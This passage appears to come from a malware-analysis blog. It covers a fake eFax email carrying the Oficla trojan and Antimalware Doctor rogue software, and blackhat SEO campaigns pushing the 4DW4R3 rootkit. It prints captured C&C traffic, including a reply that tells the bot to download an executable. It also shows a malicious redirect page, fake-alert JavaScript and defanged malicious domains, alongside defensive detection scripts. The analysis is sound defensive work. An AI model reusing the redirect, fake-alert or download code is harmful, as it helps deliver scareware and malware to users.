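            "findings": suspicious_entries(text)}

if __name__ == "__main__":
    for finding in suspicious_entries(SAMPLE_HOSTS):
        print(finding)
```

On the infected machine call `audit_hosts()` as administrator; a System (and usually Hidden) attribute on a file that normally has neither is the tell, and `attrib -S -H` on the file is needed before it can be edited back.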

eFax False Email Spreads Antimalware Doctor

This morning we received an interesting email from (a fake) eFax with a suspicious ZIP archive (.ZIP) attached; the subject of the email claims we have received a fax, "You've got a fax". The strange part is that the ZIP file contains an executable (.EXE) carrying the icon of MS Word.

Image

Report date: 2010-09-17 13:42:07 (GMT 1)
File name: efax-97901doc-exe
File size: 43008 bytes
MD5 hash: 5276e96227570b2bf6ec85a306db1027
SHA1 hash: 60fe4ecb7cb2b6e9c3173223c35b0fee3aa5149a
Detection rate: 6 on 16 (38%)
Status: INFECTED

The relevant headers from the source of the received email are as follows:

Image

From: “eFax” efax(at)efax.com
Received: from efax.com (unknown [95.139.213.105])
Subject: You’ve got a fax
Date: Thu, 16 Sep 2010 15:36:03 +0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
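Two checks that follow directly from the headers and the attachment above: the `Received` line records the peer announcing itself as `efax.com` while the receiving server could not resolve its address (`unknown`), and the archive hides an executable behind a document-style name. The script below is an added example, not from the post: it parses the `Received` header for that mismatch and inspects a ZIP in memory for executable members, including ones that carry a harmless extension but start with a PE header. The `Received` line is the one quoted; the ZIP is constructed with tiny stand-in members (an `MZ` prefix), not the 43008-byte sample.

```python
# Added example (not from the post): two checks for a mail like the one
# above. The Received header is the one quoted; the ZIP is constructed in
# memory with tiny stand-ins (an 'MZ' prefix), not the 43008-byte sample.
import io
import re
import zipfile

RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\((\S+)\s+\[([0-9a-fA-F.:]+)\]\)")

def sender_check(received):
    """(helo_name, rdns, ip, suspicious) from a 'Received: from X (rdns [ip])' header.
    The MTA writes 'unknown' when the peer IP has no PTR; a peer announcing a
    brand domain from such an address is the usual spoof pattern."""
    m = RECEIVED_RE.search(received)
    if not m:
        return None
    helo, rdns, ip = m.groups()
    suspicious = rdns.lower() == "unknown" or not rdns.lower().endswith(helo.lower())
    return helo, rdns, ip, suspicious

EXEC_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js"}
DOC_HINTS = ("doc", "pdf", "fax", "invoice", "scan")   # assumed list of lure words

def zip_findings(zip_bytes):
    """[(member, size, reason)] for executables, and for 'documents' that start with a PE header."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            lower = name.lower()
            ext = lower[lower.rfind("."):] if "." in lower else ""
            magic = zf.open(info).read(2)        # only the first two bytes are needed
            if ext in EXEC_EXT:
                reason = "executable inside archive"
                if any(h in lower[: -len(ext)] for h in DOC_HINTS):
                    reason += ", named like a document"
                findings.append((name, info.file_size, reason))
            elif magic == b"MZ":
                findings.append((name, info.file_size, "PE header under a non-executable extension"))
    return findings

def build_sample_zip():
    """Constructed attachment: an .exe with a fax/doc-style name plus a renamed PE."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("efax-97901doc.exe", b"MZ" + b"\0" * 62)
        zf.writestr("fax.pdf", b"MZ" + b"\0" * 62)
    return buf.getvalue()

if __name__ == "__main__":
    print(sender_check("Received: from efax.com (unknown [95.139.213.105])"))
    for finding in zip_findings(build_sample_zip()):
        print(finding)
```

The magic-byte branch matters because a renamed executable passes any extension-only filter; the `DOC_HINTS` check is a lure-word heuristic, not a verdict.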

We have executed the file in our sandbox and this is the file activity:

Image

The file created in the system directory is named hyli.igo; it is the main executable of the Oficla trojan, which is used to control the victim's computer and to install the rogue security software Antimalware Doctor.

Network Traffic:

GET /group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 HTTP/1.1
User-Agent: Opera\9.64
Host: moneymader .ru

Response:

[info]delay:15|upd:1|backurls:hxxp://91.204.48.46 /milk/69.exe[/info]

The malware connected to the C&C server of the Oficla trojan to receive new commands from the bot owner. From the response to the GET request we can see that the malware received the command to update itself ("upd:1") with a new binary located at the URL given in "backurls:".
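The `[info]...[/info]` reply above is small enough to parse completely, which is what you want when turning a sandbox run into indicators: the update flag says whether a second-stage fetch is coming, and `backurls` gives the host to block. The following is an added example, not from the post: the field names follow the reply shown above, but the unit of `delay` is not stated there, and handling of several comma or space separated `backurls` values is an assumption.

```python
# Added example (not from the post): parse the '[info]...[/info]' reply
# the Oficla C&C returned above into fields and IOCs. Field meaning follows
# the post (delay, upd, backurls); the unit of 'delay' is not stated there,
# and support for several comma/space separated backurls is an assumption.
import re
from urllib.parse import urlsplit

INFO_RE = re.compile(r"\[info\](.*?)\[/info\]", re.S)
URL_SPLIT_RE = re.compile(r"[,\s;]+(?=(?:hxxp|http)s?://)")

def refang(url):
    """Undo defanging: hxxp -> http and remove the blank the post inserts before the path."""
    url = re.sub(r"^hxxp(s?)://", r"http\1://", url.strip())
    return re.sub(r"\s+([./])", r"\1", url)

def _int(value, default=0):
    try:
        return int(value)
    except (TypeError, ValueError):
        return default

def parse_oficla_reply(body):
    """None if no [info] block; else dict with delay, update flag, backurls and raw fields."""
    m = INFO_RE.search(body)
    if not m:
        return None
    fields = {}
    for item in m.group(1).split("|"):
        key, _, value = item.partition(":")      # partition: URLs contain ':' too
        fields[key.strip()] = value.strip()
    raw_urls = fields.get("backurls", "").strip()
    backurls = [refang(u) for u in URL_SPLIT_RE.split(raw_urls) if u.strip()] if raw_urls else []
    return {"delay": _int(fields.get("delay")), "update": fields.get("upd") == "1",
            "backurls": backurls, "raw": fields}

def iocs(parsed):
    """Hosts (or IPs) the bot is told to fetch from: block or alert on these."""
    return sorted({urlsplit(u).hostname for u in parsed["backurls"] if urlsplit(u).hostname})

SAMPLE = "[info]delay:15|upd:1|backurls:hxxp://91.204.48.46 /milk/69.exe[/info]"

if __name__ == "__main__":
    parsed = parse_oficla_reply(SAMPLE)
    print(parsed)
    print(iocs(parsed))
```

A non-numeric `delay` or a reply without the `[info]` block is handled rather than raising, so the parser can run over a whole proxy log of bot traffic without stopping on the first odd response.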

Next, the Oficla trojan started to download the Antimalware Doctor installer. As the image below shows, it looks like an installer for Microsoft Windows Updates, but it installs the rogue security software Antimalware Doctor instead:

Image

A constant symptom of a rogue security software infection is the repeated false security alert stating that the system is infected by a large number of trojans; the user is pushed to click the "Remove Threats" button, which opens the main program and runs a fake system scan:

Image

This is the main GUI of Antimalware Doctor:

Image

Task manager has also been disabled:

Image

New Network Traffic:

GET /inst.php?do=2&a=XXX&b=en&c=XXX&d=10&e=Win5.1.2600SP2 HTTP/1.1
Host: s.statst .in
 
GET /load/load.php?a=XXX&b=en&c=XXX&e=Win5.1.2600SP2 HTTP/1.1
Host: statst .in
 
GET /setup710binfile.exe HTTP/1.1
Host: outgtrf .in
 
GET /install.php?do=1&coid=XXX&fff=XXX&IP=XXX&lct=ITA&v=X240 HTTP/1.1
Host: s.statst .in

Antimalware Doctor then displayed fake security alerts that redirect to the website used to purchase the rogue security software. Keep in mind that the payment systems used by these rogues are fraudulent and in many cases can also steal the credit card details entered during the payment process:

GET /purchase.php?aaa=csp&fff=XXX&sbb=X240-1-aftscann&lct=ITA&ttt=1&tns=1&sss=2&nocashe=1 HTTP/1.1
Host: statst .in

SSL Connection used during payments:

83.133.115.9:443

Domain & IP Analysis:

moneymader .ru / 109.196.134.44
91.204.48.46
outgtrf .in / 89.187.53.250
s.statst.in / 85.234.191.21
statst.in / 85.234.191.21
83.133.115.9

BlackHat SEO Attacks Redirect to 4DW4R3 Rootkit

We have analyzed a new blackhat SEO attack in recent days and noticed that the main goal of these attacks is no longer the spread of rogue security software: they now try to spread the dangerous 4DW4R3 rootkit, which may later be used to install a new rogue security software on the victim's computer.

Below is a short analysis of the network traffic captured during the analysis of these new blackhat SEO attacks. The targeted keywords are mostly related to the iPhone, episodes of cartoons and World Cup 2010 matches.

Hijacked URL:

traseusa .com/images/page.php?r=keyword

Response:

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://portalkey .org/?affid=415&subid=landing">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://portalkey .org/?affid=415&subid=landing";
</script>
<a href="hxxp://portalkey .org/?affid=415&subid=landing">Please Click Here</a>
</body>
</html>

Domain & IP Analysis:

portalkey .org / 91.212.127.96

The domain portalkey .org is used to display to the user fake security alerts and false system scan reports showing the system is completely infected by trojans:

Image

By analyzing the source of the HTML page we can see that it uses JavaScript to display the fake alerts and the fake system scan reports; as an example, here are a few lines of code extracted from the page:

{ 		
	alert(this.___("Windows Security Center recommends you to install System Security Antivirus."));
	t.MyConfirm(); 	
}

Image

ExitPopupMessage():

ExitPopupMessage : function()
{ 	
	alert(	this.___("Your computer remains infected by viruses!") + 
	this.___("They can cause data loss and file damages and need to be cured as soon as possible.") + "\n\n" +
	this.___("Return to System Security and download it secure to your PC")); 
}

In particular, the above code is executed every time you try to close Internet Explorer, and it forces the infected page open again even if the user clicks the "Cancel" button. This works as persistence code whose purpose is to make sure the user will, sooner or later, click on the malicious page and download the rootkit executable.

clicksmell .org/x92s/uc12vx04/xdtldil.php?id=369

Domain & IP Analysis:

clicksmell .org / 91.188.59.220

At this point the download of the 4DW4R3 executable is requested:

portalkey .org/dl.php?f=XXX&subid=1

Image

Response:

HTTP/1.1 200 OK
Server: nginx/0.7.63
Content-Type: application/octet-stream
Pragma: hack
Content-Length: 11776
Content-Disposition: attachment; filename=WinSecurityInstaller.exe
Content-Transfer-Encoding: binary

Note that the executable is named like a rogue security software installer, "WinSecurityInstaller.exe", but in reality it installs the 4DW4R3 rootkit.

Cookies:

Cookie: NOT_UNIQUE=1; USER_DATA=XXX; TEMPLATE=XXX; affid=409; subid=landing

We have executed the rootkit loader in our sandbox:

Image

Network activity:

GET /a/ad HTTP/1.1
Host: www.searchannoying .org
 
GET /any3/5-direct.ex HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org
 
POST /css/pragma/knock.php HTTP/1.1
Host: analitycsdead .com
 
GET /css/pragma/crcmds/main HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/srcr.dat HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crcmds/install HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crfiles/serf HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crfiles/bbr HTTP/1.0
Host: analitycsdead .com
 
GET /readdatagateway.php?type=stats&affid=415&subid=landing&version=4.0&adwareok HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org

Domain & IP Analysis:

searchannoying .org / 91.212.127.96
analitycsdead .com / 62.122.73.242
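The request captures in these posts (request line, headers, blank line between requests) share a few traits that separate bot traffic from the browser noise around it: IP-literal `Host` headers, user-agents that are not browsers (`Sm17a_2211`, `wget 3.0`, and `Opera\9.64` with a backslash where a slash belongs), repeated `HEAD /` probes, and the `knock.php` / `crcmds` / `crfiles` paths seen above. The script below is an added example, not from the post: it parses that capture format into records and applies those rules, while letting the legitimate `Microsoft-CryptoAPI` fetch from the Smart Engine post through. The capture is constructed from requests quoted in this and the earlier posts; the thresholds and path keywords are assumptions, not published signatures.

```python
# Added example (not from the post): turn the request captures printed in
# these posts (request line, then headers, blank line between requests)
# into records and apply a few triage rules. The capture below is
# constructed from requests quoted in this and the earlier posts; the rule
# thresholds and path keywords are assumptions, not published signatures.
import re
from collections import Counter

CAPTURE = """\
HEAD / HTTP/1.1
User-Agent: Sm17a_2211
Host: 74.125.45.100

HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100

HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100

GET /group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 HTTP/1.1
User-Agent: Opera\\9.64
Host: moneymader .ru

GET /any3/5-direct.ex HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org

POST /css/pragma/knock.php HTTP/1.1
Host: analitycsdead .com

GET /css/pragma/crcmds/install HTTP/1.0
Host: analitycsdead .com

GET /GLOBESSLDomainValidatedCA.crt HTTP/1.1
User-Agent: Microsoft-CryptoAPI/5.131.2600.2180
Host: crt.globessl.com
"""

REQ_LINE = re.compile(r"^([A-Z]+)\s+(\S+)\s+HTTP/(\d\.\d)$")
IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
BROWSER_UA = re.compile(r"^(?:Mozilla|Opera)/\d")          # 'Opera\9.64' fails this on purpose
KNOWN_TOOLS = ("Microsoft-CryptoAPI/",)                    # legitimate non-browser clients
BOT_PATHS = ("knock.php", "/crcmds/", "/crfiles/", "bb.php")   # heuristic, from the captures

def parse_capture(text):
    """-> [{'method','path','version','headers'}]; hosts are re-fanged ('x .ru' -> 'x.ru')."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = [l for l in block.splitlines() if l.strip()]
        m = REQ_LINE.match(lines[0].strip()) if lines else None
        if not m:
            continue
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip().replace(" .", ".")
        records.append({"method": m.group(1), "path": m.group(2),
                        "version": m.group(3), "headers": headers})
    return records

def triage(records, loop_threshold=3):
    """[(label, [reasons])] per request, in capture order; empty reasons = nothing flagged."""
    repeats = Counter((r["method"], r["path"], r["headers"].get("host")) for r in records)
    out = []
    for r in records:
        host = r["headers"].get("host", "")
        ua = r["headers"].get("user-agent", "")
        reasons = []
        if IP_HOST.match(host):
            reasons.append("host is an IP literal")
        if ua and not BROWSER_UA.match(ua) and not ua.startswith(KNOWN_TOOLS):
            reasons.append("non-browser user-agent: " + ua)
        if "\\" in ua:
            reasons.append("backslash in user-agent (malformed product token)")
        if any(p in r["path"] for p in BOT_PATHS):
            reasons.append("bot command/file path")
        if r["method"] == "HEAD" and repeats[(r["method"], r["path"], host)] >= loop_threshold:
            reasons.append("repeated HEAD to the same host (connectivity/beacon loop)")
        out.append((f"{r['method']} {host}{r['path']}", reasons))
    return out

if __name__ == "__main__":
    for label, reasons in triage(parse_capture(CAPTURE)):
        print(label, "->", reasons or "clean")
```

The allow-list for known tools is the part worth extending on a real proxy log: the user-agent rule alone would flag every OS component that speaks HTTP, and the whole point of the triage is to leave the CryptoAPI fetch unflagged while the `Sm17a_2211` beacon next to it stands out.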

Files in Temp Directory:

Image

After a few hours this new window popped up:

Image

Surprise ? No… It is a rogue security software installer…

Blackhat SEO Attacks targeting (again) World Cup 2010

World Cup 2010 is still a very popular keyword in search engines, and we have recently noticed again various blackhat SEO attacks hijacking keywords related to World Cup 2010, its players and its matches.

The pattern is always the same: a user searches for a keyword, hijacked URLs show up even on the first result pages, and after the user clicks a malicious URL he is redirected to a fake YouTube video page that serves setup files of rogue security software. During the analysis we logged a few new dangerous domains used in these recent blackhat SEO campaigns:

www4.protect-soft92.co.cc / 74.118.193.81
www4.protect-soft91.co.cc / 74.118.193.81
www4.protect-soft90.co.cc / 74.118.193.81
www4.protect-soft89.co.cc / 74.118.193.81
www4.protect-soft88.co.cc / 209.212.149.19
www4.protect-soft86.co.cc / 209.212.149.19
www2.soft-analysis84.co.cc / 74.3.166.116
www4.protect-soft82.co.cc / 209.212.149.19
www2.soft-analysis82.co.cc / 74.3.166.116
www2.soft-analysis81.co.cc / 74.3.166.116
www2.soft-analysis79.co.cc / 74.3.166.116
www2.soft-analysis72.co.cc / 94.228.220.112

These malicious websites display the fake scanner page to scare the user with repeated security alerts and to simulate a scan report full of threats that mimics the "My Computer" folder:

Image

The rogue security software installed during our tests is named Security Tool; once installed it blocks the execution of every application unless its file name is iexplore.exe. In other words it lets the user open only Internet Explorer (iexplore.exe) and blocks everything else. A simple workaround is to rename your analysis tools to iexplore.exe, after which they run just fine.

Fake security alert that blocks the execution of a legit setup file:

Image

Main GUI of the rogue security software Security Tool:

Image

Another fake security alert:

Image